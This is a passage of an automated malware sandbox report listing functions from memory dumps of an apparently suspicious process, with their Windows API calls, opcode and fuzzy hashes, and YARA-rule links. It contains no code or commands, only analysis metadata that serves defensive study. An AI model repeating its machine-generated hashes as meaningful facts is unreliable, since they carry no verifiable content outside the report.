                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1E2757B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID: \Os $\Os $lMs
                                                          • API String ID: 4139908857-1765695522
                                                          • Opcode ID: 011f482a17fc748fa0305d2795ef84e5f952d6448366105d08448dc6ceeff358
                                                          • Instruction ID: da8c86ed77c6feecb4ee92f9adf013f58b1f2d10cc6bbaadce8c3a90b5974952
                                                          • Opcode Fuzzy Hash: 011f482a17fc748fa0305d2795ef84e5f952d6448366105d08448dc6ceeff358
                                                          • Instruction Fuzzy Hash: 48C1AC74E047869FCB14DFB9C8A095EBBF6BF89204B108A6AC416DB751DB34F845CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 012876C7, Relevance: 3.6, APIs: 2, Instructions: 631libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserExceptionDispatcher.NTDLL ref: 01287727
                                                          • LdrInitializeThunk.NTDLL ref: 01287881
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054771210.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                          Similarity
                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                          • String ID:
                                                          • API String ID: 243558500-0
                                                          • Opcode ID: fb7fc79de5b072dfa86b9fe8963c407deb5cccaa45376d05603de4ad70484a0f
                                                          • Instruction ID: 8488b749425ee43cd1ff8ddaace5d91b7ee6d45964b73625c374ab0d42cb4f9e
                                                          • Opcode Fuzzy Hash: fb7fc79de5b072dfa86b9fe8963c407deb5cccaa45376d05603de4ad70484a0f
                                                          • Instruction Fuzzy Hash: 0D626F74915264CFCB68EF74C89869DBBB6BF88205F1040EAD90EA3794CB745E81CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0128770C, Relevance: 3.6, APIs: 2, Instructions: 622libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserExceptionDispatcher.NTDLL ref: 01287727
                                                          • LdrInitializeThunk.NTDLL ref: 01287881
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054771210.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                          Similarity
                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                          • String ID:
                                                          • API String ID: 243558500-0
                                                          • Opcode ID: d51cba44af1501fc0aa05fabe09ad1c9e807508255e51565d6a0307d2ec3bfa3
                                                          • Instruction ID: 12c4acd986ff8fd61deea541e91bd88eb7c8f1db1a57c5540f9a61a9857aec7b
                                                          • Opcode Fuzzy Hash: d51cba44af1501fc0aa05fabe09ad1c9e807508255e51565d6a0307d2ec3bfa3
                                                          • Instruction Fuzzy Hash: 26527F74915264CFCB68EF74C89869DBBB6BF88205F1040EAD90AA3794CF745E81CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01291724, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 01292A22
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054872640.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: &s
                                                          • API String ID: 1029625771-2194292877
                                                          • Opcode ID: 5dda584aeccc5c842b3575178df0dc97ec3994be218227abfc58f2b2353ba096
                                                          • Instruction ID: 445eb9a82595528db33f235873045a05fbad366381b0457a03447e4dc9a36bda
                                                          • Opcode Fuzzy Hash: 5dda584aeccc5c842b3575178df0dc97ec3994be218227abfc58f2b2353ba096
                                                          • Instruction Fuzzy Hash: 6A1112B6D00249DFDB20CF9AD448ADEFBF8EB88310F10842AD919A7600C378A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01287748, Relevance: 2.1, APIs: 1, Instructions: 617libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054771210.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3ff14bf452ab7a9b0b5118a38845aced47ecd6bf213edc071df015cfb63fe28e
                                                          • Instruction ID: 90bd9517407596ae69d747b4e77ba634eec4181b01e600b473d5d916b5fb508d
                                                          • Opcode Fuzzy Hash: 3ff14bf452ab7a9b0b5118a38845aced47ecd6bf213edc071df015cfb63fe28e
                                                          • Instruction Fuzzy Hash: 5E527074915264CFCB68EF74C89869DBBB6BF88205F1040EAD90AA3794CF745E81CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01292768, Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054872640.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25036395792138cdfe0ee026949872ef89e99d1feea5e4b3778e1e99b1adb261
                                                          • Instruction ID: 8a4ca3c7fedf1bb5cd608ec918945fb626b608496e2983cec7764aad7bb60f78
                                                          • Opcode Fuzzy Hash: 25036395792138cdfe0ee026949872ef89e99d1feea5e4b3778e1e99b1adb261
                                                          • Instruction Fuzzy Hash: 01918974A10B02EFEB24CF6EC4507AABBF5BF88214F044A2DD546DB650DB74E805CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1D7B8358, Relevance: 1.7, APIs: 1, Instructions: 200libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52064861916.000000001D7B0000.00000040.00000010.sdmp, Offset: 1D7B0000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2a2c2c5c9b08e394b474d1ce0fa7dd7074045a0488ca3e5b821f731dfcd584b9
                                                          • Instruction ID: 9cc808d2ee3d4cf0947864b1e688b867a6f8dbf519f636bfde9ea4da19806543
                                                          • Opcode Fuzzy Hash: 2a2c2c5c9b08e394b474d1ce0fa7dd7074045a0488ca3e5b821f731dfcd584b9
                                                          • Instruction Fuzzy Hash: 3461C934B002059FCB08EBB4C894AAE77B6BFC5314F148969D506AB394DF75EC45CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01337048, Relevance: 1.7, APIs: 1, Instructions: 181libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055038117.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 98731b8c7cb6e3b37b611d7a6ee1a5ef8a0d724bd96419cc674b43f4e3bdafbc
                                                          • Instruction ID: 0b79df3e6054cbc112d6ffcaa4bdf6704f1ce79d18db433206e894755617e554
                                                          • Opcode Fuzzy Hash: 98731b8c7cb6e3b37b611d7a6ee1a5ef8a0d724bd96419cc674b43f4e3bdafbc
                                                          • Instruction Fuzzy Hash: 51512635B093858FD3029BB8DC646AA7BF5AF86314F2884B6D404DB392DB39DC46C761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01337198, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055038117.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 96fb197a265fc6b1d8edefa4251096e0450d1635048748423d6a29983898141b
                                                          • Instruction ID: fd0bbf4e8be92dde8adaa01a3b7c7fff567e25b23a2e3a2d300c62259478bcbe
                                                          • Opcode Fuzzy Hash: 96fb197a265fc6b1d8edefa4251096e0450d1635048748423d6a29983898141b
                                                          • Instruction Fuzzy Hash: F5618274A10359DFDB14EFB5C8987AEBBF5AF84304F148928E406A7390DF74A841CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E274A08, Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E27690A
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: f55476e547a9e27428360ee63a5f245c44de01a368b03b9dcb48140975c2095e
                                                          • Instruction ID: 20c7fcfd0ae7328429fe713a6066d1f5f86583c54305e51dfa40f107bc20f24b
                                                          • Opcode Fuzzy Hash: f55476e547a9e27428360ee63a5f245c44de01a368b03b9dcb48140975c2095e
                                                          • Instruction Fuzzy Hash: 115178B1C04389DFCB11CFAAC8A0ACEBFB5BF59304F24865AE444AB211D7709844CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1D7B83F1, Relevance: 1.6, APIs: 1, Instructions: 140libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52064861916.000000001D7B0000.00000040.00000010.sdmp, Offset: 1D7B0000, based on PE: false
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 273cefbbf3f5ecb33c5cf2c950ced8fafed8c7e9aecd8fc89663be2994dc24b2
                                                          • Instruction ID: d0edbd93b3f4221207486e85030a1a577118b2fdc8b90246708b5325c8e616db
                                                          • Opcode Fuzzy Hash: 273cefbbf3f5ecb33c5cf2c950ced8fafed8c7e9aecd8fc89663be2994dc24b2
                                                          • Instruction Fuzzy Hash: EB51A735B002059FCB04EFB4C899AAEB7F6BF85210F148969E516AB394DF75EC048B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0136BF23, Relevance: 1.6, APIs: 1, Instructions: 137threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateThread.KERNEL32(-444B1A52), ref: 0136BFD9
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055152621.000000000136B000.00000040.00000001.sdmp, Offset: 0136B000, based on PE: false
                                                          Similarity
                                                          • API ID: TerminateThread
                                                          • String ID:
                                                          • API String ID: 1852365436-0
                                                          • Opcode ID: 98e9dbc144ae98211c3904ba42bffe72afee53bf97f1f14aeccb0efe6c9b89cc
                                                          • Instruction ID: e2fcc7e6857c544d3774735c5b3a3fbb7889081e00941c87b8ac60e45b1d65f2
                                                          • Opcode Fuzzy Hash: 98e9dbc144ae98211c3904ba42bffe72afee53bf97f1f14aeccb0efe6c9b89cc
                                                          • Instruction Fuzzy Hash: 5E415C752443464EDB254E3C85E47DA3797AF43294F198269CDC58B16AE3269889C702
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1D7BA2E0, Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52064861916.000000001D7B0000.00000040.00000010.sdmp, Offset: 1D7B0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e075ad956ab4a2f6088b7cc49d3ad9ad010621b35b1887108627fee53913f3c7
                                                          • Instruction ID: 8de1a54944d18c6530375d05c3c5b4494a56cc01bb9ddfc2cd77060d219335b2
                                                          • Opcode Fuzzy Hash: e075ad956ab4a2f6088b7cc49d3ad9ad010621b35b1887108627fee53913f3c7
                                                          • Instruction Fuzzy Hash: 3141F871D003599FCB04DFA9D4047DEBBF5EF89310F158A6AD504A7250DB789845CBD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E274A7C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E27690A
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 5d4c4a20c0d0b02d69f8854c3c418d5955046fb3de974c2c87ebc01df778f8ff
                                                          • Instruction ID: 67d0767c3b99921bdd9130f196852f93d83d4dd7037d3544265abe952a8a70ae
                                                          • Opcode Fuzzy Hash: 5d4c4a20c0d0b02d69f8854c3c418d5955046fb3de974c2c87ebc01df778f8ff
                                                          • Instruction Fuzzy Hash: F351C2B1D00349DFDB14CF9AC894ADEBBB5FF48310F20862AE819AB210D774A945CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01285CE8, Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000,?,01285CCD), ref: 01285DB8
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054771210.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 6c1cf5d17be79a99eef42cbe3b1d9603bfdf07ecd74e737f97b408c1df4d7dd3
                                                          • Instruction ID: 8ffe5bcd0ca208b314ac13430fc887544096ed200ee452d4cb7283d092b27633
                                                          • Opcode Fuzzy Hash: 6c1cf5d17be79a99eef42cbe3b1d9603bfdf07ecd74e737f97b408c1df4d7dd3
                                                          • Instruction Fuzzy Hash: 00312471D0134A9FDB10CFA9C40879EFBF4EF46304F1481AAD944A7382D734A846CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 013383F9, Relevance: 1.6, APIs: 1, Instructions: 97registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01338501
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055038117.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: d251d65b49dcd7284a422b83936289dacec8756c1c626f8dc3806ccb8d746363
                                                          • Instruction ID: 35eaf79addd7f8276a3f0178d0756583daf95a25a0620827ab453ab4d183dab5
                                                          • Opcode Fuzzy Hash: d251d65b49dcd7284a422b83936289dacec8756c1c626f8dc3806ccb8d746363
                                                          • Instruction Fuzzy Hash: 1331BE719043599FDB21CFA8C884B9EBFF4AF45348F144599F808AB691C739C845CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E27A144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 1E27B4D9
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 9721c5af7b47459e4066ff6524c5f6b3fa71ab2eeebdd7cea2e47e2bd874a2af
                                                          • Instruction ID: a0df6af5a4f1df44fa2a3ce6e445dc0384138eaaf8cb60ecb9e43378e60eb60c
                                                          • Opcode Fuzzy Hash: 9721c5af7b47459e4066ff6524c5f6b3fa71ab2eeebdd7cea2e47e2bd874a2af
                                                          • Instruction Fuzzy Hash: 8D4118B4D00249CFDB14CF95C4A8A9ABBF6FF89314F24C559D61AAB321D774A841CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0133843C, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01338501
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055038117.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: 06464ee17fe7c896a8dc22193dd057763a9224460a42601835c75fd645e31f12
                                                          • Instruction ID: da8f2904559f911c71846bcdd5795ea4df2d516098f4e6fd274d851482c1b0b2
                                                          • Opcode Fuzzy Hash: 06464ee17fe7c896a8dc22193dd057763a9224460a42601835c75fd645e31f12
                                                          • Instruction Fuzzy Hash: 3241F0B1D00258DFDB10CF9AC884A8EBFF5BF88714F14856AE818AB354D7749945CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01338448, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01338501
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055038117.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false
                                                          Similarity
                                                          • API ID: QueryValue
                                                          • String ID:
                                                          • API String ID: 3660427363-0
                                                          • Opcode ID: f9e1709f7517b98a53bcb711baeb959f2b8bcc065bc2eea8f70b91568d1a18ac
                                                          • Instruction ID: 3e03ac69eeb262f4a1210a0a6635322cd8b38be1546ab50b1284cd9a413e2167
                                                          • Opcode Fuzzy Hash: f9e1709f7517b98a53bcb711baeb959f2b8bcc065bc2eea8f70b91568d1a18ac
                                                          • Instruction Fuzzy Hash: EE31EEB1D00258DFDB20CF9AC884A8EBFF5BF88704F14856AE818AB354D7749945CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 013381D9, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 01338294
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055038117.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: 399f0d5469571f0e73771fc0156832e1483e728c30f06eb6d84ec23ad8e7c268
                                                          • Instruction ID: 328ebf3059e7375f0660e2c6b0a1f7e858b0cd540d1e7f85e519404667344f0b
                                                          • Opcode Fuzzy Hash: 399f0d5469571f0e73771fc0156832e1483e728c30f06eb6d84ec23ad8e7c268
                                                          • Instruction Fuzzy Hash: 343104B0D002499FDB14CF99C588A8EFFF5BF49308F24866AE908AB311C7759945CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 013381E0, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 01338294
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52055038117.0000000001330000.00000040.00000001.sdmp, Offset: 01330000, based on PE: false
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: b4544afb4db9a8d962b21cd4e6a8314d10c712953d3a6d95cb2786b75f66964f
                                                          • Instruction ID: 92d02ea4c4222b4ee926b5d380c7917505a610615d714519c298ea87c28ab6bd
                                                          • Opcode Fuzzy Hash: b4544afb4db9a8d962b21cd4e6a8314d10c712953d3a6d95cb2786b75f66964f
                                                          • Instruction Fuzzy Hash: 8C31E2B0D012499FDB10CF99C588A8EFFF5BF49308F24866AE808AB351C7759945CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E27A54C, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E27A5D7
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 6ab684b28e0aedc29dd93c61212410972320f8f40523898df0b179cf57bb6ca8
                                                          • Instruction ID: aa8e399e70ef0026a912e3f952be2b72a856c1d05ff1e0f0a6cca7e2305c7e2e
                                                          • Opcode Fuzzy Hash: 6ab684b28e0aedc29dd93c61212410972320f8f40523898df0b179cf57bb6ca8
                                                          • Instruction Fuzzy Hash: B02126B5D00249DFDB00CF9AD884ADEBBF8FB49310F20851AE955A3310C378A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E27A550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E27A5D7
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 23b141f75dd4ae86b78f3ac752801151b7338194460c759d8e002807ac1c18cc
                                                          • Instruction ID: ae75289f074d267961bd97ccb044f374971a268300f80c94951d245a9771a32e
                                                          • Opcode Fuzzy Hash: 23b141f75dd4ae86b78f3ac752801151b7338194460c759d8e002807ac1c18cc
                                                          • Instruction Fuzzy Hash: 7421E0B5D002099FDB10CFAAD884ADEBBF8EB48320F14841AE915A7210C378A944DFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E275721, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1E2757B6
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 4d1e29340f394f2aafbe515876599c180ee0ddbd19648ad77a1260555f888551
                                                          • Instruction ID: 3e447278332d1f2b3faecb5afda1f381964f8db57e32c5a5daeb4c5370547dff
                                                          • Opcode Fuzzy Hash: 4d1e29340f394f2aafbe515876599c180ee0ddbd19648ad77a1260555f888551
                                                          • Instruction Fuzzy Hash: 802134B5C00789CFDB04CF9AC45468AFFF9BF89214F20869EC459AB612D335A546CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01284898, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000,?,01285CCD), ref: 01285DB8
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054771210.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 2553eed9ff4294052dfc96c3280fc30ca999e237ace6a373cd137ea4f6ea3cd0
                                                          • Instruction ID: 858faabdfdaac89926a2aac804af8072fae13aa1de2e03bedab4fb4b46e1e3be
                                                          • Opcode Fuzzy Hash: 2553eed9ff4294052dfc96c3280fc30ca999e237ace6a373cd137ea4f6ea3cd0
                                                          • Instruction Fuzzy Hash: 1A2144B1C0061A9BCB10CF9AC4487EEFBF4EF48320F10852AD918A7340D738A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1D7BE530, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(00000000,00000000), ref: 1D7BFC76
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52064861916.000000001D7B0000.00000040.00000010.sdmp, Offset: 1D7B0000, based on PE: false
                                                          Similarity
                                                          • API ID: FindWindow
                                                          • String ID:
                                                          • API String ID: 134000473-0
                                                          • Opcode ID: fa51a88c08659ff6f6db5f66cc94d904deb6b256dfbb16d7e4119e01972d75ab
                                                          • Instruction ID: a4dfa9e61665c18120ed5991c4c716dc2f2355bdb422e00173af0ec161a1357b
                                                          • Opcode Fuzzy Hash: fa51a88c08659ff6f6db5f66cc94d904deb6b256dfbb16d7e4119e01972d75ab
                                                          • Instruction Fuzzy Hash: 8D21F4B6D012098FDB10CF9AC484AEEFBF4FF49620F10852ED819B7601C376A545CBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1D7BFBF9, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindWindowW.USER32(00000000,00000000), ref: 1D7BFC76
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52064861916.000000001D7B0000.00000040.00000010.sdmp, Offset: 1D7B0000, based on PE: false
                                                          Similarity
                                                          • API ID: FindWindow
                                                          • String ID:
                                                          • API String ID: 134000473-0
                                                          • Opcode ID: b0a3f279e6e7243096ec88e2faacaf0271a43a39f0b1618191993d3c3a40857b
                                                          • Instruction ID: 44c490151d7aac837d2f57a03736367e435c695d09fd1cf4e82a58742cd0af6c
                                                          • Opcode Fuzzy Hash: b0a3f279e6e7243096ec88e2faacaf0271a43a39f0b1618191993d3c3a40857b
                                                          • Instruction Fuzzy Hash: 9D21F4B6C012198FCB14CF99C445AEEFBB4FF49724F10851ED819B7600C37AA545CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E275749, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1E2757B6
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 0d8adff46eefdd7a99dae44b97df2ada0ec9488a04fc97b0be85377a2f5fe8a5
                                                          • Instruction ID: c2eef26c2fcc8bffca57a3c9a5f0c56756215e588c00d17e249c8f9985c4c07b
                                                          • Opcode Fuzzy Hash: 0d8adff46eefdd7a99dae44b97df2ada0ec9488a04fc97b0be85377a2f5fe8a5
                                                          • Instruction Fuzzy Hash: 7B1120B5C0028A8FDB10CF9AC444BDEFBF8BF89224F10851AD819B7600C374A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 012929B0, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 01292A22
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52054872640.0000000001290000.00000040.00000001.sdmp, Offset: 01290000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: e2d0a1db20e507576f053915d2751b1693d78b545717e2c3624772729b5ba15d
                                                          • Instruction ID: 0f04ef0b5af14369e087535f77021517b5f6b44f95453e6f5140aefa2900e31d
                                                          • Opcode Fuzzy Hash: e2d0a1db20e507576f053915d2751b1693d78b545717e2c3624772729b5ba15d
                                                          • Instruction Fuzzy Hash: 181123B6D00209CFDB20CFA9D548BDEFBF4AF48314F10882AD919A7200C378A545CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1E2737C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1E2757B6
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.52066125854.000000001E270000.00000040.00000001.sdmp, Offset: 1E270000, based on PE: false
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 04e293d5c76a870ca97941a9154969a67f23558969988f8d5df8f68ae9fd5642
                                                          • Instruction ID: 798d5819a40268bb155a8289ae9633e24ab37078cadf61e06cb71dcc607cff37
                                                          • Opcode Fuzzy Hash: 04e293d5c76a870ca97941a9154969a67f23558969988f8d5df8f68ae9fd5642
                                                          • Instruction Fuzzy Hash: 5C110FB5C00649CFDB10CF9AC444BDEFBF8AF89224F20856AD929B7601D379A545CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 012968E8, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 01296945
                                                          Memory Dump Source
